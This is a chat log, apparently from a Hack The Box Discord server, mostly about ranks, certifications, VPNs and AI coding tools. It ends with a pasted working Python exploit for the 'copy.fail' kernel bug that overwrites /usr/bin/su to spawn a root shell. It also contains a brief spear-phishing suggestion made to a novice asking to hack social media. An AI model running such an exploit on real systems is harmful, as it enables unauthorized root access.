yeah for now i think so

It’s just extra steps really

only one left to do

Grinding academy will help.

im gonna try

But yeah academy will help

some people really recomended it i just dont know how much it's gonna help

It’ll atleast give you a good idea of what you’re missing and how to find it

The penetration tester path will equip you to do most medium, and almost all easy machines.

for now ive been able to do some easy on my own really, its just im lacking motivation

Funny how the at works huh

but when i put my mind to it i do tend to get some flags alone

I’ve actually done easy machines harder then mediums

ok thx ill try to remember

Just cause of docker

And APIs

(Also my Linux priv esc is no bueno)

It depends because the pentester path doesn't cover a lot of complex web stuff, and most boxes start with web.

Yeahhh

how do you see next rank and stuff?

Uhhh

There’s a blog post about it

Click on your profile on the site

haven't done a lot of boxes but i think i only once saw a box start with a non-web service

idk if that's the correct name

They do exist, but it's just less common.

yeah

Usually they're AD or something

i only see the new levels not the hacker rank

ohhhh ok

that might be why haha

The rank is just below your name, for the old rank.

oh but no progress?

wow 67

nice

im thinking of tackling ADs in about 4 months or so

can't wait

Rank progress is based on ownership %

It's weird

Well, the old rank, that is

no no i know the count and all

it's just before it was shown

I don't know where it shows, in the new UI

% of ownership was, at least

I imagine they're going to just get rid of the old rank, anyway

damn

not cool

i liked the old rank system

Nah, the old rank sucked lol

bruh

i kind of liked that it only counted based on active boxes

Do you have VIP+?

it was harsh but it gave me a bit more motivation to do boxes

no but i did have it for a month some time ago and last month too

My 13k usdc on sol got drained out of my phantom wallet yesterday. I had 120k in other coins but they were still there. I haven’t connected my wallet to anything in months and I only used legitimate websites. Below I attached the transaction hash, can someone please look into this and tell me how it happened I’ll pay.

5ZLDLu1oRkqmUk6VQgUtdR4kvxjo9g3SEp4YQJemDYFe7rquXbvk13zcfiMBBcGgXBrCdpLgd4W5DMJCN67ihLh4

guys

i still didn't do the starting point lmao

Nobody can help you here.

help me instead

Did you do any old easy retired boxes?

if I can call an arbitrary php namespace how can I test for RCE

HELP HERE

yeah quite a bit, i tried doing one a day. In my profile it says 26 boxes i think it's 25 easy

25 or close to it

it was really a nice month haha

but now back to work...

php namespace + constructor arguments

So, you might have noticed that old boxes were... SIGNIFICANTLY easier than current boxes. Someone who got a rank 5-7 years ago might be like 2-3 ranks lower, if they tried to grind it today.

HALP

But since you can never downrank, you can never tell the skill of someone, by the rank.

Namespace but with object?

Oh that old? I really did every box back to season 7 i think so maybe not far back enough

but ppl told me they were easier yes

array with 2 params 1 is the namespace and 2 is the arguments that supposedly the constructor receives

There are some boxes that take like 5 minutes. Boot2root level easy.

if im correct ranks dont stay you have to have a completion % of active boxes right?

You never lose your rank that you earned.

I got hacker like 4 years ago or something lol

I haven't done like any boxes in forever.

hoooo

ok

i thought it didn't stay

Your placement rank changes

damn i should have farmed for it when i could

Just lock in

It’s not that bad

Nah, rank is meaningless, which is exactly why they're looking to change it.

Tedious

At least the new rank system is better to gauge how someone is progressing across the platform.

yeah ok that makes a lot of sense, i thought i changed with seasons, it actually made a lot of sense for me

Season rank does fall off.

i get it

that's why im afraid lmao

That's a third ranking system lol

no not season i did mean old system

hacker and all

I am not sure if PHP has something like this bit there might even be a something like a Function class for something like reflection you could call with this to run arbitrary code?

i meant i thought it diminished when a completed box was retired

Yeah, those will stay. You can never go below, but you need to own everything up to your current rank, and the ownership % required for the next rank, to move up.

Yeah, your current % does go away when something retires.

So like, if I wanted to grind pro hacker, I need to grind up everything to the ownership of hacker, and then also up to pro hacker.

yeah makes sense

i get why you say it was bad

not that good indeed

<?php phpinfo(); ?>

i just don't like the systems where you can see people's progress, puts pressure i think

It would be okay if the difficulty never changed, but it did.... drastically lol

to grind efficiently

Im trying to validate if it's what I think or not...

Boxes are hard ma boi

Nah, people celebrate that shit

Boxes be hard

lmao

who would celebrate progressing, embrace staying bad

It would be nice to see people progressing. You have no idea how many blue/green posters we get who are stuck at that rank for months/years, because they only do academy.

Now, we can watch you padawans grow

yeah makes sense

lmao padawans

we live in a world where everyone wants to be the "best"
but bruvv just do ur thang homie dont compare urself with anyone cuz there'll be alwaysz sum1 bEtTaAaHhH

Marcie is still skid rank, even lol

you'll see me tackle medium boxes and fail now, how cool

Marcie will jump up to master rank, in the new system

idk who is marcie

for me its the vampire from adventure time

Marcie probably helps more people than anyone else in the server lol

Someone who used to be a mod

idk i have sent 2 messages here

at best

I am not sure what exactly your case is but if you already know you could call an arbitrary namespace you could try this? https://www.php.net/manual/en/class.reflectionfunction.php Or are you still testing IF you can call an arbitrary namespace?

Nah i think i do

Yesterday i helped someone get to hackthebox.com

https://tenor.com/view/girl-sure-jan-sarcastic-brady-bunch-gif-11590179

From the hack the box discord?

Pro

yeah I am testing if I can call an arbitrary namespace since the second parameter seems to reflect different outputs changing the values

Hacky.xs?

Or is it still Xssy

it's something else

i impulse ordered a racing sim setup

Valid

Good luck dude

ok thx for the help guys, see you

Say bye to your family while you can

😄

My dad used to do competitive sim racing

Doesn’t have as much time anymore

how dare you hack my computer now all the pop ups are gone

Lofi time

like the wheel and such ?

wheel, 3 pedals, stand and gear shifter

that gotta be fun

i saw someone use the airforce training setup to play warthunder lol

Hihi

So the first parameter looks like it could be a function or a class?

What's up?

"spec5":["Base\Modules\ContentGrouping\ApiSpec",{"group_id":"1"}

gtg...

sorry...

Disclaimer, I am still kinda new to hacking but am a PHP developer so I can only give my ideas. But yeah looks like a namespace to me, too. What happens if you change the name of this class?

Sorry I had to leave my computer...
When I put a wrong class name it didn't throw any error only gave empty output but it reacted changing the values of the json

i think so...I'm starting the Forza Horizon 5 and Asetto Corsa. Forza is more forgiving and about just having fun driving around. Asetto Corsa is more of a driving simulator with more realistic physics and whatnot.

Play farming simulator… my new tractor has great handling

yeah as backspace said farming simulator would be fun too with the setup

i'll check it out

Lol, it is kinda boring but I can’t stop playing it

Expanding my lettuce empire

You know I feel like if played a sim game I’d never play another game

I think I have that kinda autism

Allow me to suggest factorio

I can’t play it

For that exact reason

Dragons, today I’m offering a 45% stake in my Leaves for Thieves Lettuce company for $6.5 million

I know who I am

Same… i def have ADHD, but also potentially mild autism

I love to hyperfocus and infodump

Ask my kids

I am kinda intrigued if it has RCE now or at least what some gadgets could be for testing this

Can I dm?

Sure. But as I said I am not that good jet haha. But sure

dude I was just playing a link to the past just now

How was it

hey guys

i jsut started my subscription with htb and I completed a module

i realized its very theory heavy and I was wondering if you guys have any suggestion for more hands on content

I am unfortunately someone who mostly learns from hans-on compare to just reading theory

Gotta learn to walk, before you can run. Follow one of the skill/job role paths, as they will set you up with what you need.

i agree I'm not saying I want to disregard the theory completely, I'm just saying I was surprised but how little pratice there was in the module itself

Which direction are you trying to go, and how much experience do you have?

in cybersecurity I have almost 0

but I just graduated as a computer systems engineer

I am mostly leaning towards red teaming, maybe do blue team later on but for now for sure read team

usually other way around

The 'penetration tester' job role path will start you out with some theory, and then jump into practical training.

red team is high supply, low demand. high skill requirements

ya thats the one i started with

blue team is highish supply , high demand, lowish skill requirements

mmmm i see

@rancid snow any joker with AI and a 2 CPU Kali machine can do red teaming… ask me how I know 😉

In that case, it only has minor theory before it gets into action.

at start it is loaded with theory

Facts with an asterisk

mmmmmm okok

ya I was worried that it would be mostly theory

Nono, just the start.

And a little at the end, regarding reporting/note-taking.

well thats good to know at least

is there a specific role path you would recommend for red teaming specifically?

Still have lots of work left on my project, but I think by end of next weekend it should be bearing some fruit

would be this weekend but Im going to the zoo with fam

You have to do penetration testing, before you can do red teaming.

oh I will dont worry im not gonna skip it

i just like to plan stuff out

@rancid snow look forward to hearing about it

you are on the right path

but CAPE basically is the follow-up towards AD, after CPTS.

I think in retrospect I could have halved the amount of time its been taking me, but it is also literally my first AI involved project so learning time was part of the goal

@rancid snow dm?

sure

you can't jump into the sea without knowing how to swim

is that the "Active Directory Penetration Tester" job role path?

agreed

bruhh just don't over think for now

just go through the path that you enrolled

you will find your way

good

https://tenor.com/view/the-horrors-persist-the-horrors-persist-but-so-do-i-sunset-pink-depressed-gif-789389344890958049

Yeah. It's meant to be done after CPTS.

I have a question concerning CPTS.

alright perfect, thank you guys for your help

Not sure if I'm allowed to ask, but is EVERYTHING in the modules on the exam or most of the material?

If you're thinking about jumping into it, though, it's both quite expensive, and will be significantly difficult.

Everything in the CPTS path could be on the exam

Yeah, try lots of things… figure out what you like

Then pursue certs if you want

Yeah, all the modules in the path should be the bare minimum for the exam

https://tenor.com/view/ai-cat-cat-bread-gif-13133767875531312554

hello, who do i talk to if i found a teeny tiny mistake in the nmap course? it might not be one but i just want to talk about it in case its something useful. if not well i sincerely apologise

thanks sending this to daughter

what's the mistake?

idk why you need a course for nmap, pretty easy to figure out

its nothing and i find myself annoying to even mention it but when they list the options used in the example, there is just one that was not mentionned thats all

first of all im new to all this, second im doing the path for the cpts certificate

kinda forced to go through it

also doesnt do any harm to go in depth

hes gotta be trolling

ah I see

got u

tell me how to evade fw

30 seconds no googling

hm?

ok

dont listen to him

?

im confused

don't listen to me? why?

keep learning nmap

I didn't tell him to stop learning it, you can pretty much learn everything u need to know about nmap on the man page

I watched a yt course on nmap too tbf

yk i started all this only 3 days ago

i already beat some boxes

in only 3 days

yeah hes new lmao

doing a module is a good idea

im doing a path

pentest

u made it sound like it wasnt a good idea for him to do the nmap module

nmap --help will help with that

its not because the htb one is shit

better off watching some yt tutorial

also this doesn't exactly have one answer, no?

its doesnt

by fw I assume u mean firewall

but u didnt name one in 30secs

@rough mirage how long have u even been doing all this

ok my bad mr

like a year idk
I have a comptia network plus

that's about it, working on other certs

anybody seen more about this? https://copy.fail/

a year and cant name one evade fw? although i started 3 days ago and its like u judge me for learning

ig u gotta check out that module aswell

a year on and off, yeah, I have a cert but I can't tell you what an mtu is. never said I was good

is fragmenting packets

so u confuse the fw

ffs bro i feel like i keep hearing microsoft teams pings

I wanna change my name to undecillion

u have a job?

ahaha that's very cool

yes im a cyber sec analyst

u want it?

im over it

other way is spoofing the source iirc
idk im not good at this

https://tenor.com/view/will-ferrell-confused-math-huh-what-gif-10118626

yeah decoinyg ips

you can also spoof ports

yeah

then obviously timing

idk what else after that

me neither

oh

I think there's one where you don't actually send it but it's via a zombie or smth

?

Yes, I’ve been reading about it today

yeah that sounds right

Requires local access

@jagged storm I found SQM build-in cake thing in cheaper option. let's see I will get a bit later. I'm going to have full of routers in my house. I don't know what tha hack

But it’s a container escape

idk ur right tho man page helps but all i wanted to point out is it makes sense to do the module

nah ill live off my trust fund 🙏

yeah I get what u mean

I'm curious to test it on an HTB box (that I've already completed) but is that frowned upon?

I should think

Set it up on your own pc

Podman or docker

Test it out

Yeah, I was thinking that too

Don't have a usable PC or SBC though, so I'll sit it out

i should download more ram fr

Really? I am running 5 containers on my shitty kali box

It doesn’t need to be that powerful

This laptop has been through it, no space, I can hardly install new software. I'm just trying to fix my PC, then I'll be back on that.

Ah

I’ve flagged it for exploration tomorrow

Guysss

What is correct way to learn scripting

to script

What should be my first project

Nd from where

Im COMPLETE beginner in cybersecurity

start by learning the basics

to understand what you're working with

then get to scripting

try the Getting Started module

its really good

i beat my first box thanks to that

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

No hints are allowed for the duration of the event. Once the event is over, feel free to share solutions.

Done the basics solved approx 70 THM rooms

In which pre security completed and soc L1 path done 50%

Any admin I can give a quick nudge in PM?

are u 1% tho

Me?

yes 1% on thm

Im in top 6% thm

Is it good or bad?

1% thm isnt even scratching the basics yet

its a meme for a reason

Means it's a big joke being top 1%›

@rancid snow I am 2% there and I can confirm that being there ~2-3% is good enough to pwn a easy box on HTB lol

By pwn u mean to compromise right?

kek

that is what it means right

Lol

So hack the box is better then thm

Anyway, any staff I can DM?

Top 6% is way too low?

I'm sleepy

technically according to the rules were not allowed to disparage htb's competitors.

So with that in mind I can say thm is a good for an initial introduction but theres a vast world out there

Diplomatic answer but I got the crux 😂

I got 6% just doing some random christmas event that I was basically half asleep at the keyboard for

did u win any gifts

no

the problem with thm is this: the labs are made by children that think they are funny making steghide images that need different mime types to extract a funkie password

based

Im solving paths

Top % fron THM is a joke

rem the goat

Is it hard to get in top % in HTB

Rem, can I dm you something quick before I go offline?

yeah thm rooms are mostly just toy puzzles.

arguably so are a lot of htb boxes too, but they at least tend to wear the skin of the real world

2 months of grinding

without cheating? yes. thats a lot of time commitment involved

For bug bounty is this the right platform?

eh

People reccomend portswigger

portswigger is good for web stuff yeah

I recommend that for sure

portswigger is very good to learn web and its free

But idk it's actually challenging for me

everything will be challenging if you're starting

nothing great comes easy

I just got my first laptop so everything here is very confusing before this I was only familiar to Android

if port swigger isnt challenge for you then youre off to a decent start

Nope 😉

It's like switching to Windows then all of a sudden getting vm nd linux in it

Nd now port swigger was like insane difficulty for me even UI is confusing

I’m kidding, it is difficult and it takes a long time (or did for me anyway)

Ahmm makes sense

Easy lab on thm: 😊
Easy lab on HTB: 😢 🔥 💥 😔

thm hard is genuinely htb easy lol

Nah i spent 2 says on fluffy this week actually why is that not a medium

for another comparison sake, OSCP boxes cap out at low medium htb

not done that box and just read 0xdf's summary with it and ya know what I agree with you that does sound like a medium lol

How does someone get good at scripting

Lowkey anything to do with certs in any domain of IT just completely cook me

And how to make your first project

Practice

Id not focus on security until you have the fundamentals down

But where am I supposed to practice

What language?

Bash

in a terminal then

YouSuckAtProgramming on YouTube is good

😐

And I'm fr that's the name

They have projects?

That I can make while I learn

They designed their website so you can use curl to browse it in a terminal

And they have videos to teach you

I honestly don't know of anyone better at bash but I also don't do much bash anyways

Just tell me if I'm doing right way I will tell u the road map I'm following

bash isnt much of a 'project' language

There isn't no "right way" it depends on how you learn

99% of actual bash usage is just learning command linux sys utils and how pipes work lul

I completed pre security nd jumpeed to soc L1 THM path and then I learnt a bit of bash and I need to practice nd I'm learning networking side by side

U think I'm following the right path

??

Id do one thing at a time starting out

Networking is hard enough on its own

We can't do cool stuff with bash?

??

Like automating something crazy...

Can it control our keyboard and mouse? And clicks?

uhh sorta? but itd be a pita

bash isnt really a full programming language, its best usage is combining other tools together

(yes I know bash is turing complete and strictly definitionally speaking is a full programming language but you know what I mean)

If you are interested HTB Academy have a SOC learning job path

Paid?

Id use python at that point

yes
https://academy.hackthebox.com/app/paths/390/details

Me clicking random links lol

oof

That two when Im Between hackers 💀

yeah u need that path

Ohkk

Im already 50% in soc path of thm

Should I leave in between nd start fresh?

No

With htb

Finish it then move on

Don’t quit halfway through

Ok okkkkkk

What was your learning path?

Then you’ll really understand the difference between the two platforms

No, you can just finish your THM learning path and then moving on the HTB path for modules you feel interesting to you, you can purchase specific modules instead of the whole path

CompTIA a+ > CPTS

Broo u guys think wireshark is difficult tool?

No

@thick jacinth are you a student?

Yes

It’s weird, but just watch a yt video

then dont buy modules or paths, just use the student sub if you can

^

THM made the wireshark a complete horror show

I bet

Elaborate

True, didn't think of that, wish i was still a student

Don’t pay for any subs besides the student subs when you transition to HTb

https://help.hackthebox.com/en/articles/13465244-getting-the-student-subscription

It’ll save you money

Thanks mate

The basic paths can get pretty expensive if you're not a student

While you’re a student

Yeah, for me that don't want to pay yearly subs for the Pen tester path it's about 2 months of platinum subscription cubes (about 135dollars)

Mhm

damnnn

It one of the cheaper options still imo

• exam voucher

even more money there

U guys make notes

Yup

About 400 ateotd

Or just keep everything in your head

Both

Apart from networking nd scripting I don't see any point of notes

I just downloaded cheat sheet for tools

Yeah, but i don't want the exam, just want to have a learning path, learn by doing machines and when i feel good go for OSCP+

thats good, follow lains kusanagi list for OSCP

Most pentester job listing i've checked ask for OSCP so that's the good way i think

notes allow you to make sense of the cheat sheets; the HTB exams don't test you on copy/pasting commands

I'll put that in my notes thank you

the report expects you to have some knowledge of what you did, why you did it, and the impact and remediation

yw, nice profile btw

Thank you

For landing interviews yeah it's decent

You got OSCP money?

We got OSCP at home

nowhere near as good as it used to be though

OSCP at home:

https://preview.redd.it/i-passed-pt1-review-feedback-v0-x7js18mv8w5f1.jpeg?width=640&crop=smart&auto=webp&s=86766eac6210558fde2e2df46be3456fb6aa3a39

places want more now

I didn’t realize that’d paste that dudes whole Reddit link

I just wanted the picture

at chevelle I saw a guy with a THM shirt on

Did you kill them?

Sure yeah but still hard to name a better cert general in terms of pure recognition value

for sure

no but he had a defcon 30 hat and I wanted to talk to him about the defcon group in my city

Did you

Well actually no, but in 3 years i should have it

My prayers are with you then

Thank you

idk if oscp will be worth it in 3 years lol

itll cost twice as much on top

why not

oh or u just mean the price worth not the value of the cert?

that and the trend of less and less importance being certs at all in a saturated market

no

I would've been too high anyways to talk

https://tenor.com/view/ai-the-somnium-files-somnium-somnium-files-ai-aiba-gif-14636491456412264235

what tools would you need for mobile challenges

They do have the benefit of it expiring now, though

So even if they don't have a lot of new people, they have a steady stream of existing ones

Anyone else out there having issues with getting the machines to start? I've tried a few different machines, and I'm having issues with them all. Error: Failed to spawn

Nah that's just the "plus", used for gov roles where renewable certs are required

very nice

And for random HR that demands the plus because 'it must be better'

https://tenor.com/view/these-go-to-eleven-nigel-tufnel-this-is-spinal-tap-these-go-higher-than-ten-these-go-beyond-the-limit-gif-14815064966019984807

If you are good you wouldnt ever talk to an HR lady until you are signing onboarding paperwork

Hello is there any hackers here ? Im looking to create a clan and work together for a project, dm me.

sorry no hackers here

Even having some experience like creating webs or like discord bots is good for a beginner

A clan?

https://tenor.com/view/home-alone-family-sucks-family-new-family-kevin-mccallister-gif-823429599366584146

For what project

studying done emiru live bye bye gl

oh boy

https://tenor.com/view/star-wars-meme-its-an-older-meme-but-it-checks-out-gif-14147822

actually i dont know the meme

he jus look cute n silly

It's dolan

this look like a 9gag level meme

finnish board

https://tenor.com/view/garen-mog-garen-garen-mew-league-of-legends-meme-gif-14777060859658316031

At which point its not a company you wanna work for 👍 goes both ways

https://tenor.com/view/star-wars-meme-its-an-older-meme-but-it-checks-out-gif-14147822

hi guys how is everyone?

studying...

I finished a make up electronics lab today

Its a little deep, but not illegal, Im going to create the best hacker group in the world.

what's that?

i lowkey thought i just got banned from claude/anthropic lmao

apparently theyre down

I'm taking electronics classes at a trade school in my area

three year trade

Awesome

whatchu studying?

Even if it's illegal, it's for a good cause.

Networking for now

nice I had a CCNA but it expired

mine is CCNT

I don't know if there is an expiration

that's a huge topic: Networking

there normally is for Cisco certs

oh that's good to know

If you're working in the field no one gives a shit about your certificate being expired unless it's required active for some gov shit

No one's going to care or check

yeah like unless its required to be able to make the company money, they have zero reason to care

i.e. maintaining check team member status

I have CCNA but it took me a year of study lol

Hello guys I'm new here

hi

Wassup

going to bed, you ?

Same

u learned something today?

Nah I haven't start yet

Do you know how to hack?

yes but I'm a beginner

Same so what can you hack right now for me I haven't learn how to hack anything I'm just trying to learn now

I hacked a wireless network 😀

Really did you learn it here?

What about social media?

no, I learned on youtube by myself

is not that hard

Oh ok I thought you learned it here so you came here to learn more

for social media you can use spear phising

Is it free?

😆 yes

Like I can search it on Google

Please can you teach me 🙏🏻

you can use google and AI is everything what you need

https://klipy.com/gifs/dead-to-me-6

What am I reading

😆

hackers

No like I can see the spear phising on Google

how old are you ?

I'm 20 but I'm new in anything hack

I have no clue

first you need to start learning the foundation the concepts

start with tryhackme is very beginner friendly

it's illegal

This is illegal.

Ok 🆗

if you hack your girlfriend account too see with who is cheathing you will go to jail bro

How old are you?

40

Then why you scared

What does scared have to do with it?

I'm scared for you., if you go to jail

I can't sacred or none of that

I'm not gonna go to jail bro chill

Correct. You will go to prison.

Federal prison.

Nah I'm not what about you how old are you?

if you break the law you go, and there in the showers is not nice buttnaked with some 30 dudes waiting for you to drop the soap

whats the age has to do about it

Old enough to know better. Fuck off with illegal requests.

Oh my bad

nobody is scared but the difference is we have brain 🙂

We don't give a shit. It's against the server rules, against discords rules, and there are probably even feds sitting in this channel right now, adding you to a watch list.

Damnnnn

Yeah I know

So again, stop or be removed.

My bad

I already stop I was just joking around

lmao classic larping loser

little bitch behavior

Bro, I was even thinking of you, during this shit lol

Yoo I already apologize

No survival mechanism

words are cheap to type, but the chud is internal

There are absolutely feds in this channel

rat himself is a fed

https://tenor.com/view/spy-tf2-spy-x-family-spy-bruh-bruh-moment-gif-25527210

You can tell I'm not a fed because I gave up mod powers

A fed would want to stay in power

Only existing mods are suspect

that's what a fed would say.

I see you TAO.

exposed

https://tenor.com/view/waltergotme-gif-18867690

feds

@jagged storm

to be percise

wassup gng what vpns can you recommend me?

tailscale

depends on what you use it for

mullvad

Any of them.

nord

https://tenor.com/view/bye-cat-meow-chat-gif-14778852254694362862

Literally any VPN

Wont' protect you from shit.

So pick any of them and be merry

i know it and i want vpn that is not mostly blocked in websites and has a good speed

nord will be fine then

Yeah, it's more like shifting trust from your ISP to your vpn of choicr

shoot even the firefox VPN would prolly work

what's your opinions on 1VPN?

never heard of em

Proton vpn seems sus tho

if you have basic needs then nord is probably the best basic vpn

I think they're like 1password

like a subsidiary

stressing the word basic here

yeah i used proton and some websites blocked it

Proton VPN is sus

any vpn you use is going to get some places to block you

all VPNs are sus

they're just pretend ISPs

100% agree

bruh

make your own vpn

tailscale ^^

if your only requirements are fast and websites dont block you, then actually your best bet would be to set up a tail scale or equivalent on an amazon instance

(you won't have to pay money if you use tailscale)

vpns are essentially secondary ISPs.

is it tor based?

cause then sites shouldnt even know youre using a vpn

Idk how expensive it is to setup the EC2 instances though

tor isnt a vpn

Why not just use a VPS and tunnel SSH through it, setup a socks5 proxy

oh fine

tor is a whole ass different thing lol

that's pretty much what we're saying

Word

no proxy with socks5, but tailscale is basically that

pretty sure websites block vpns to prevent potential bot traffic or malicious traffic

idk if you've used it

100%

maldev academy won't let me use their site with my VPN on

like at all

I have to tell them first

ik HTB blocks some VPNs or used to

vps > vpn?

I've used Privado VPN for years. They don't offer ipv6 but they are fast and good.

apples > oranges

^

no one really uses ipv6 anyways lol 😅

I use ipv6

why.

It's globally routable so it bypasses NAT

this is true if youre blind lol

It has some use cases.

I give a solid 80% chance youre using ipv6 right now and dont know it

cloud providers ik use it but to my knowledge normal companies never really adopted it fully as a replacement for ipv4

we're not normal people

The fuck make syou think we're normal?

lol

You ever use cellular service?

100% not 80% 😆

that's a different protocol I believe

cell phones deploy ipv4 NAT heavily and use ipv6 primarily

most enterprise environments i've done IT stuff in all use IPv4

but yeah cloud and mobile I notice use mainly IPv6

sure for part of the hop 🙂

it's dual stack i think

fuck ipv4 subnetting

ipv6 ftw.

that doesn't count

fuck NAT too

ipv6 for the win

vlans aren't real guys

if you use IPv6 and IPv4 dual stacked, you aren't using IPv6

hehehe

this is canonical

every network should be flat like the earth 🔥

fuck heirarchy

lots of companies are basically just banking on ipv6 being difficult to mass scan without dns records as their entire firewall strategy was 'NAT drops incoming request'

for few years but ipv6 will take over soon

we'll have dyson spheres before ipv6 is adopted by everything

ipv6 is nice

this is also canonical

You have watches,
but we have the time!

You have the weapons,
but we have the rhyme!

From Cyrus the great to the youth in the street,
We don't know surrender. We don't know defeat.

Fucking love Iran and their Lego videos

Sick tunez

Okay

good night gamers

CPTS to be continued

nice

good night

Yeah, exactly.

Just mean we need to have robust firewall rules

I believe I’m close to elite hacker

Nice

Sup Donut

root flag for overwatch and ai’m elite

nothin much, u?

Donut did you get CC working for free yet?

careful it'll delete your model

like for real

unless you aren't talking about claude code

Yes, CC= Claude code

that's what I thought

codex > claude

I manually verify everything CC is about to do before I let it touch my codebase or system. Every piece of code is audited by me, every command. I don't let it auto do anything.

Can't blame the AI for developer mistakes man

Devs just choose option 2, and let CC do whatever the hell and rely on prompts

That's a recipe for disaster

not yet

I don’t need CC rn, but I’ll set it up at some point

I have a question

really?
I’ve used codex before, and it was really good, but never used claude code

I might have an answer

What's up

Ill let it do a lot of code changes in one pass, but I have a bunch of validators going on, and the only tool it can use besides grep are tools built specifically for the project at hand.

git is never ran even through the interface, only I the human type out git

lol

claude was the goat but anthropic nerfed opus and rate limits

ohh

that

yes

I'm using local model with CC

qwen/qwen3-coder-480b-a35b-instruct

How to cope with people criticizing that u used AI to make projects
-# just asking generally, if u face this too

I don't use Claude models.

not messed with local models yet, on my todo list

as ryan once said
blame 0xdf for all problems u have with claude
jk

https://www.linkedin.com/posts/lexiecooper_i-love-dns-it-always-works-great-for-me-activity-7424486962042073090--4Ai/

Take 10mg Fukitol daily.

how can ur computer run a 480b

Basically, just learn not to give a fuck.

legendary GPU - 3060

my project either has undeniable results and it doesnt matter how it was built, or it was a shitty project to begin with

understood

I'm already a dev, and I code 5000% faster with AI than alone.

I have a 3080TI and can barely run a 32b

also my project was started initially to learn how much of ai usage is hype or bullshit first hand anyways instead of parroting other peoples opinions

If you're not already a developer, using vibe coding can hurt you

90% of vibe coding is code audit.

Human review

same ...i already am a SWE too

how many tokens/s u getting?

Check last night's DMs

probably its still using CPU then

it is yeah

id argue 90% is actually project management lul but similar sentiment

potato potahto

it uses all my 12GB vram on my gou

gpu*

weird then

and 70% of cpu

lol

wait , 3080TI has just 12GB?

yeah

sed

alright

nvtop info

I've got Stable Diffusion 1.5 model loaded right now

how much did u think it had lol

whats ur gpu

I've got 12GB VRAM

i thought 16 but ok

3060 RTX 12GB

WHAT?

usually the xx80 has 16

why does mine run so slow then

skill issue?

😄

I use ollama

I don't use ollama. I use oobabooga's text generation web ui or LM studio

so weird

for stable diffusion I use AUTOMATIC1111

weird

i just made an awesome ai tool today

spent hours on it today

example of bad use of ai

so mine should run much faster

lol

why you giving ai any credit card lmao

Yeah I do the same on privacy.com

Make cards and use those

with spending limits

So people won't be able to overcharge me

yall seen this yet? https://copy.fail/

yes...did u get ur 3080Ti from Temu
-# /jk

https://gitlab.com/Eggzy/funguybot/-/blob/main/plugins/lastfm.py Here i what I made tonight with Deepseek and Claude Code

of course not

does anyone want to have a look at my github repository

in dms

I've tested it already and the POC works on supposedly every linux kernel right now I think

why not share here , we wont cover your judge by the book

alright

I tested it on kernel 6.18 on kali

https://github.com/pb3ck/quarry

damn seems very interesting

thanks

┌──(stoned㉿kali)-[~/tmp]
└─$ python3 e.py                                 
# 

That copy fail is crazy!

Holy shit.

yeah, the weird payload thing for the SUID binary is an elf file that spawns a new shell as root

the vuln itself is something in a cryptography kernel module

#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")